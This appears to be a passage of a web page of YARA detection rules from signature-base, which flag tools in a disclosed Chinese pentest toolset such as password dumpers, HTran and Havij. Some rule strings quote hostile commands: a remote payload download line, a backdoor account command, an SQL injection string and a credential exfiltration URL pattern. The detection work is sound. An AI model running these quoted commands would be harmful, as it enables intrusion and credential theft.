description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 50
hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
strings:
$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "http://www.foundstone.com" fullword ascii
$s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file GetHashes.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetHashes {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
strings:
$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file GetHashes.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetHashes_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
id = "31117d2e-caf1-58c9-8525-b40b73097928"
strings:
$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "GetHashes.exe $Local" fullword ascii
$s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
}
Copy rule
CN_Honker_GetPass_GetPass
Sample from CN Honker Pentest Toolset - file GetPass.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetPass_GetPass {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
strings:
$s1 = "\\only\\Desktop\\" ascii
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file GetSyskey.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetSyskey {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
strings:
$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file GetWebShell.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetWebShell {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
id = "919883f4-af66-5d07-ad41-8cba3e049396"
strings:
$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
$s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}
Copy rule
CN_Honker_GroupPolicyRemover
Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GroupPolicyRemover {
meta:
description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "7475d694e189b35899a2baa462957ac3687513e5"
id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
strings:
$s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
$s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
$s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
condition:
uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file 32.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_HASH_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file 32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
strings:
$s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
$s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
$s9 = "Specific LUID NOT found" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 240KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file PwDump7.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_HASH_PwDump7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
strings:
$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 380KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file pwhash.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_HASH_pwhash {
meta:
description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "689056588f95749f0382d201fac8f58bac393e98"
id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
strings:
$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file HTran2.4.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_HTran2_4 {
meta:
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "524f986692f55620013ab5a06bf942382e64d38a"
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
strings:
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 180KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Happy.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Happy_Happy {
meta:
description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
id = "6e6c806d-e784-507f-b327-3b9f2510422b"
strings:
$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
$s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
$s3 = "http://www.happysec.com/" wide
$s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Havij.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Havij_Havij {
meta:
description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
strings:
$s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
Copy rule
CN_Honker_HconSTFportable
Sample from CN Honker Pentest Toolset - file HconSTFportable.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_HconSTFportable {
meta:
description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
strings:
$s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
$s2 = "www.Hcon.in" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 354KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Hookmsgina.dll
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Hookmsgina {
meta:
description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
strings:
$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
Copy rule
CN_Honker_Htran_V2_40_htran20
Sample from CN Honker Pentest Toolset - file htran20.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Htran_V2_40_htran20 {
meta:
description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
strings:
$s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
Copy rule